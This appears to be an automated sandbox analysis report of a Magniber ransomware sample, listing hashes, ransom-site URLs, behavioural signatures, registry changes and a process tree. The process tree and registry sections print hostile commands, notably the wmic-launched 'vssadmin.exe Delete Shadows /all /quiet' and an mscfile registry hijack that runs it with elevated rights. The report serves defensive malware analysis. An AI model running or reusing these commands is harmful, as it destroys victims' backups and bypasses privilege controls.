Analysis
max time kernel: 101s
max time network: 131s
platform: windows7_x64
resource: win7v20210410
submitted: 18-08-2021 21:12

Static task: static1
Behavioral task: behavioral1
  Sample: 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
  Resource: win10v20210410

General
Target: 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
Size: 22KB
MD5: 8cd81ae69ade058076263addc8dd3ebb
SHA1: 362eb81ecac33897d4dd2a3f175efaaf0fe2c2f5
SHA256: 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3
SHA512: 6170bc3191b8d88043b5c7799c17338f4717af087fa4524141955d2e6cfb0cb468262bcc5c466fe39adfbc534796a79e06d84894ae9f7911b2353460580dac21
Malware Config
Extracted from: C:\Users\Admin\Desktop\readme.txt
Family: magniber
URLs:
- http://2834c0381ed008e06qwfekni.n5fnrf4l7bdjhelx.onion/qwfekni
- http://2834c0381ed008e06qwfekni.perages.cyou/qwfekni
- http://2834c0381ed008e06qwfekni.aimdrop.fit/qwfekni
- http://2834c0381ed008e06qwfekni.soblack.xyz/qwfekni
- http://2834c0381ed008e06qwfekni.sixsees.club/qwfekni
Signatures

Magniber Ransomware
Ransomware family widely seen in Asia, distributed by the Magnitude exploit kit.

Process spawned unexpected child process (8 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1300 | 2028 | cmd.exe | 44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2024 | 2028 | cmd.exe | 44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 784 | 2028 | cmd.exe | 44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 304 | 2028 | cmd.exe | 44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2024 | 2028 | vssadmin.exe | 44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1816 | 2028 | vssadmin.exe | 44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1100 | 2028 | vssadmin.exe | 44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1888 | 2028 | vssadmin.exe | 44
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies extensions of user files (4 IoCs)
Ransomware generally changes the extension on encrypted files.
description | ioc | Process
File renamed | C:\Users\Admin\Pictures\ConvertFromExport.raw => C:\Users\Admin\Pictures\ConvertFromExport.raw.qwfekni | Dwm.exe
File renamed | C:\Users\Admin\Pictures\FormatHide.raw => C:\Users\Admin\Pictures\FormatHide.raw.qwfekni | Dwm.exe
File renamed | C:\Users\Admin\Pictures\SplitInstall.crw => C:\Users\Admin\Pictures\SplitInstall.crw.qwfekni | Dwm.exe
File renamed | C:\Users\Admin\Pictures\MergeShow.tif => C:\Users\Admin\Pictures\MergeShow.tif.qwfekni | Dwm.exe
Suspicious use of SetThreadContext (3 IoCs)
description | pid | Process | procid_target
PID 2024 set thread context of 1124 | 2024 | 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe | 13
PID 2024 set thread context of 1224 | 2024 | 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe | 12
PID 2024 set thread context of 1260 | 2024 | 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe | 11

Interacts with shadow copies (2 TTPs, 4 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
2024 | vssadmin.exe
1816 | vssadmin.exe
1100 | vssadmin.exe
1888 | vssadmin.exe
Modifies Internet Explorer settings
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 2045e1677594d701 | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value omitted) | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "336085938" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000afe5b2f334402f45af9416b6043b9bf900000000020000000000106600000001000020000000aa27c9077fb47e84c54e5b205ca2055d60605ab98e8516ec4f6d4777e5fdfc4e000000000e80000000020000200000003c678f9b14343b9f105b9aabf068e9164a48a2c8c4be3de1c838e86e182c41f020000000abab1d9ca1e47db8bac53e02967cbc233c0186bf733c1f964eee5a712c8dbb1d40000000bc1c8abd6b0e73adf528507ea8edf8bf7fe826479af292df3a548bd621b56a03bd5117657d0bc244ed738fed96e397341ab166e5cd317d36bfb5f0c219ad387e | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8F3A7021-0068-11EC-B526-FEC9D8D8C4F3} = "0" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
Modifies registry class (11 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | Dwm.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | taskhost.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile | Dwm.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell | Dwm.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open | Dwm.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command | cmd.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | cmd.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command | Dwm.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command | taskhost.exe
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command | Explorer.EXE
Opens file in notepad (likely ransom note) (1 IoC)
pid | Process
1968 | notepad.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
2024 | 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
2024 | 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe

Suspicious behavior: MapViewOfSection (3 IoCs)
pid | Process
2024 | 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
2024 | 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
2024 | 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeShutdownPrivilege | 1260 | Explorer.EXE
Token: SeShutdownPrivilege | 1260 | Explorer.EXE
Token: SeIncreaseQuotaPrivilege | 1580 | WMIC.exe
Token: SeSecurityPrivilege | 1580 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1580 | WMIC.exe
Token: SeLoadDriverPrivilege | 1580 | WMIC.exe
Token: SeSystemProfilePrivilege | 1580 | WMIC.exe
Token: SeSystemtimePrivilege | 1580 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1580 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1580 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1580 | WMIC.exe
Token: SeBackupPrivilege | 1580 | WMIC.exe
Token: SeRestorePrivilege | 1580 | WMIC.exe
Token: SeShutdownPrivilege | 1580 | WMIC.exe
Token: SeDebugPrivilege | 1580 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1580 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1580 | WMIC.exe
Token: SeUndockPrivilege | 1580 | WMIC.exe
Token: SeManageVolumePrivilege | 1580 | WMIC.exe
Token: 33 | 1580 | WMIC.exe
Token: 34 | 1580 | WMIC.exe
Token: 35 | 1580 | WMIC.exe
Token: SeShutdownPrivilege | 1260 | Explorer.EXE
Token: SeShutdownPrivilege | 1260 | Explorer.EXE
Token: SeShutdownPrivilege | 1260 | Explorer.EXE
Token: SeIncreaseQuotaPrivilege | 636 | conhost.exe
Token: SeSecurityPrivilege | 636 | conhost.exe
Token: SeTakeOwnershipPrivilege | 636 | conhost.exe
Token: SeLoadDriverPrivilege | 636 | conhost.exe
Token: SeSystemProfilePrivilege | 636 | conhost.exe
Token: SeSystemtimePrivilege | 636 | conhost.exe
Token: SeProfSingleProcessPrivilege | 636 | conhost.exe
Token: SeIncBasePriorityPrivilege | 636 | conhost.exe
Token: SeCreatePagefilePrivilege | 636 | conhost.exe
Token: SeBackupPrivilege | 636 | conhost.exe
Token: SeRestorePrivilege | 636 | conhost.exe
Token: SeShutdownPrivilege | 636 | conhost.exe
Token: SeDebugPrivilege | 636 | conhost.exe
Token: SeSystemEnvironmentPrivilege | 636 | conhost.exe
Token: SeRemoteShutdownPrivilege | 636 | conhost.exe
Token: SeUndockPrivilege | 636 | conhost.exe
Token: SeManageVolumePrivilege | 636 | conhost.exe
Token: 33 | 636 | conhost.exe
Token: 34 | 636 | conhost.exe
Token: 35 | 636 | conhost.exe
Token: SeIncreaseQuotaPrivilege | 772 | WMIC.exe
Token: SeSecurityPrivilege | 772 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 772 | WMIC.exe
Token: SeLoadDriverPrivilege | 772 | WMIC.exe
Token: SeSystemProfilePrivilege | 772 | WMIC.exe
Token: SeSystemtimePrivilege | 772 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 772 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 772 | WMIC.exe
Token: SeCreatePagefilePrivilege | 772 | WMIC.exe
Token: SeBackupPrivilege | 772 | WMIC.exe
Token: SeRestorePrivilege | 772 | WMIC.exe
Token: SeShutdownPrivilege | 772 | WMIC.exe
Token: SeDebugPrivilege | 772 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 772 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 772 | WMIC.exe
Token: SeUndockPrivilege | 772 | WMIC.exe
Token: SeManageVolumePrivilege | 772 | WMIC.exe
Token: 33 | 772 | WMIC.exe
Token: 34 | 772 | WMIC.exe
Suspicious use of FindShellTrayWindow (6 IoCs)
pid | Process
1260 | Explorer.EXE
1616 | iexplore.exe
1260 | Explorer.EXE
1260 | Explorer.EXE
1260 | Explorer.EXE
1260 | Explorer.EXE

Suspicious use of SendNotifyMessage (6 IoCs)
pid | Process
1260 | Explorer.EXE
1260 | Explorer.EXE
1260 | Explorer.EXE
1260 | Explorer.EXE
1260 | Explorer.EXE
1260 | Explorer.EXE

Suspicious use of SetWindowsHookEx (6 IoCs)
pid | Process
1616 | iexplore.exe
1616 | iexplore.exe
1772 | IEXPLORE.EXE
1772 | IEXPLORE.EXE
1772 | IEXPLORE.EXE
1772 | IEXPLORE.EXE

Suspicious use of WriteProcessMemory (61 IoCs)
description | pid | Process | procid_target
PID 1224 wrote to memory of 1968 | 1224 | Dwm.exe | 26
PID 1224 wrote to memory of 1968 | 1224 | Dwm.exe | 26
PID 1224 wrote to memory of 1968 | 1224 | Dwm.exe | 26
PID 1224 wrote to memory of 1836 | 1224 | Dwm.exe | 30
PID 1224 wrote to memory of 1836 | 1224 | Dwm.exe | 30
PID 1224 wrote to memory of 1836 | 1224 | Dwm.exe | 30
PID 1224 wrote to memory of 1784 | 1224 | Dwm.exe | 27
PID 1224 wrote to memory of 1784 | 1224 | Dwm.exe | 27
PID 1224 wrote to memory of 1784 | 1224 | Dwm.exe | 27
PID 1784 wrote to memory of 1580 | 1784 | cmd.exe | 31
PID 1784 wrote to memory of 1580 | 1784 | cmd.exe | 31
PID 1784 wrote to memory of 1580 | 1784 | cmd.exe | 31
PID 1836 wrote to memory of 1616 | 1836 | cmd.exe | 32
PID 1836 wrote to memory of 1616 | 1836 | cmd.exe | 32
PID 1836 wrote to memory of 1616 | 1836 | cmd.exe | 32
PID 1124 wrote to memory of 1624 | 1124 | taskhost.exe | 33
PID 1124 wrote to memory of 1624 | 1124 | taskhost.exe | 33
PID 1124 wrote to memory of 1624 | 1124 | taskhost.exe | 33
PID 1260 wrote to memory of 520 | 1260 | Explorer.EXE | 65
PID 1260 wrote to memory of 520 | 1260 | Explorer.EXE | 65
PID 1260 wrote to memory of 520 | 1260 | Explorer.EXE | 65
PID 1624 wrote to memory of 636 | 1624 | cmd.exe | 62
PID 1624 wrote to memory of 636 | 1624 | cmd.exe | 62
PID 1624 wrote to memory of 636 | 1624 | cmd.exe | 62
PID 520 wrote to memory of 772 | 520 | wmic.exe | 39
PID 520 wrote to memory of 772 | 520 | wmic.exe | 39
PID 520 wrote to memory of 772 | 520 | wmic.exe | 39
PID 2024 wrote to memory of 1628 | 2024 | cmd.exe | 40
PID 2024 wrote to memory of 1628 | 2024 | cmd.exe | 40
PID 2024 wrote to memory of 1628 | 2024 | cmd.exe | 40
PID 1628 wrote to memory of 1680 | 1628 | cmd.exe | 43
PID 1628 wrote to memory of 1680 | 1628 | cmd.exe | 43
PID 1628 wrote to memory of 1680 | 1628 | cmd.exe | 43
PID 1616 wrote to memory of 1772 | 1616 | iexplore.exe | 46
PID 1616 wrote to memory of 1772 | 1616 | iexplore.exe | 46
PID 1616 wrote to memory of 1772 | 1616 | iexplore.exe | 46
PID 1616 wrote to memory of 1772 | 1616 | iexplore.exe | 46
PID 1300 wrote to memory of 2008 | 1300 | cmd.exe | 55
PID 1300 wrote to memory of 2008 | 1300 | cmd.exe | 55
PID 1300 wrote to memory of 2008 | 1300 | cmd.exe | 55
PID 304 wrote to memory of 1668 | 304 | cmd.exe | 56
PID 304 wrote to memory of 1668 | 304 | cmd.exe | 56
PID 304 wrote to memory of 1668 | 304 | cmd.exe | 56
PID 2024 wrote to memory of 1548 | 2024 | vssadmin.exe | 57
PID 2024 wrote to memory of 1548 | 2024 | vssadmin.exe | 57
PID 2024 wrote to memory of 1548 | 2024 | vssadmin.exe | 57
PID 784 wrote to memory of 1652 | 784 | cmd.exe | 76
PID 784 wrote to memory of 1652 | 784 | cmd.exe | 76
PID 784 wrote to memory of 1652 | 784 | cmd.exe | 76
PID 1548 wrote to memory of 684 | 1548 | CompMgmtLauncher.exe | 66
PID 1548 wrote to memory of 684 | 1548 | CompMgmtLauncher.exe | 66
PID 1548 wrote to memory of 684 | 1548 | CompMgmtLauncher.exe | 66
PID 2008 wrote to memory of 820 | 2008 | CompMgmtLauncher.exe | 64
PID 2008 wrote to memory of 820 | 2008 | CompMgmtLauncher.exe | 64
PID 2008 wrote to memory of 820 | 2008 | CompMgmtLauncher.exe | 64
PID 1668 wrote to memory of 520 | 1668 | CompMgmtLauncher.exe | 65
PID 1668 wrote to memory of 520 | 1668 | CompMgmtLauncher.exe | 65
PID 1668 wrote to memory of 520 | 1668 | CompMgmtLauncher.exe | 65
PID 1652 wrote to memory of 1676 | 1652 | sppsvc.exe | 59
PID 1652 wrote to memory of 1676 | 1652 | sppsvc.exe | 59
PID 1652 wrote to memory of 1676 | 1652 | sppsvc.exe | 59
Processes
Indentation shows the parent/child relationship; each entry lists the image path, PID, command line and the signatures that fired on it.

C:\Windows\Explorer.EXE (PID 1260)
  Command line: C:\Windows\Explorer.EXE
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe (PID 2024)
    Command line: "C:\Users\Admin\AppData\Local\Temp\3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    C:\Windows\system32\cmd.exe (PID 1628)
      Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\wbem\WMIC.exe (PID 1680)
        Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
  C:\Windows\system32\cmd.exe (PID 520)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    C:\Windows\system32\wbem\WMIC.exe (PID 772)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\Dwm.exe (PID 1224)
  Command line: "C:\Windows\system32\Dwm.exe"
  - Modifies extensions of user files
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\notepad.exe (PID 1968)
    Command line: notepad.exe C:\Users\Public\readme.txt
    - Opens file in notepad (likely ransom note)
  C:\Windows\system32\cmd.exe (PID 1784)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 1580)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe (PID 1836)
    Command line: cmd /c "start http://2834c0381ed008e06qwfekni.perages.cyou/qwfekni^&1^&39803775^&70^&347^&12"
    - Suspicious use of WriteProcessMemory
    C:\Program Files\Internet Explorer\iexplore.exe (PID 1616)
      Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://2834c0381ed008e06qwfekni.perages.cyou/qwfekni&1&39803775&70&347&12
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 1772)
        Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1616 CREDAT:275457 /prefetch:2
        - Modifies Internet Explorer settings
        - Suspicious use of SetWindowsHookEx

C:\Windows\system32\taskhost.exe (PID 1124)
  Command line: "taskhost.exe"
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe (PID 1624)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 636)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\cmd.exe (PID 1300)
  Command line: cmd /c CompMgmtLauncher.exe
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\CompMgmtLauncher.exe (PID 2008)
    Command line: CompMgmtLauncher.exe
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\wmic.exe (PID 820)
      Command line: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe (PID 2024)
  Command line: cmd /c CompMgmtLauncher.exe
  - Process spawned unexpected child process
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\CompMgmtLauncher.exe (PID 1548)
    Command line: CompMgmtLauncher.exe
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\wmic.exe (PID 684)
      Command line: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe (PID 784)
  Command line: cmd /c CompMgmtLauncher.exe
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\CompMgmtLauncher.exe (PID 1652)
    Command line: CompMgmtLauncher.exe
    C:\Windows\system32\wbem\wmic.exe (PID 1676)
      Command line: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe (PID 304)
  Command line: cmd /c CompMgmtLauncher.exe
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\CompMgmtLauncher.exe (PID 1668)
    Command line: CompMgmtLauncher.exe
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\wmic.exe (PID 520)
      Command line: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
      - Suspicious use of WriteProcessMemory

C:\Windows\system32\conhost.exe (PID 636)
  Command line: \??\C:\Windows\system32\conhost.exe "-800035401159936499210739613732136189843-11730882861985560618-457655950876638901"
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssadmin.exe (PID 2024)
  Command line: vssadmin.exe Delete Shadows /all /quiet
  - Process spawned unexpected child process
  - Interacts with shadow copies
  - Suspicious use of WriteProcessMemory

C:\Windows\system32\vssadmin.exe (PID 1816)
  Command line: vssadmin.exe Delete Shadows /all /quiet
  - Process spawned unexpected child process
  - Interacts with shadow copies

C:\Windows\system32\vssadmin.exe (PID 1100)
  Command line: vssadmin.exe Delete Shadows /all /quiet
  - Process spawned unexpected child process
  - Interacts with shadow copies

C:\Windows\system32\vssadmin.exe (PID 1888)
  Command line: vssadmin.exe Delete Shadows /all /quiet
  - Process spawned unexpected child process
  - Interacts with shadow copies

C:\Windows\system32\sppsvc.exe (PID 1652)
  Command line: C:\Windows\system32\sppsvc.exe
  - Suspicious use of WriteProcessMemory

C:\Windows\system32\vssvc.exe (PID 1484)
  Command line: C:\Windows\system32\vssvc.exe